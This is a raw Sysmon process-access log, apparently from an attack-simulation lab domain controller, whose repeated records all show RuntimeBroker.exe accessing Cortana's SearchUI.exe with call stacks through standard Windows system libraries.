13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011567Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011566Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011565Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011564Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011563Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011562Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011561Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011560Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011559Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011558Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011557Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011556Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011555Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011554Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+124d1|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011553Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12383|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011552Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12277|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011551Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.592{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+12149|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+10fca|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011550Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:30:11.576{08A6967A-4753-6000-0D05-000000009A01}11165452C:\Windows\System32\RuntimeBroker.exe{08A6967A-4761-6000-2705-000000009A01}5308C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\System32\RPCRT4.dll+4a8bf|C:\Windows\System32\combase.dll+50a2b|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+13d1e|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+1382d|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11706|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+11059|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fc69|C:\Windows\System32\combase.dll+22df|C:\Windows\System32\RPCRT4.dll+614ab|C:\Windows\System32\combase.dll+53b7c|C:\Windows\System32\combase.dll+53832|C:\Windows\System32\combase.dll+51958|C:\Windows\System32\combase.dll+505af|C:\Windows\System32\combase.dll+4f5af|C:\Windows\System32\combase.dll+4da86|C:\Windows\System32\combase.dll+4d1ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16121|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+169b9|C:\Windows\system32\Windows.Internal.Shell.Broker.dll+16da9 10341000x800000000000000011549Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 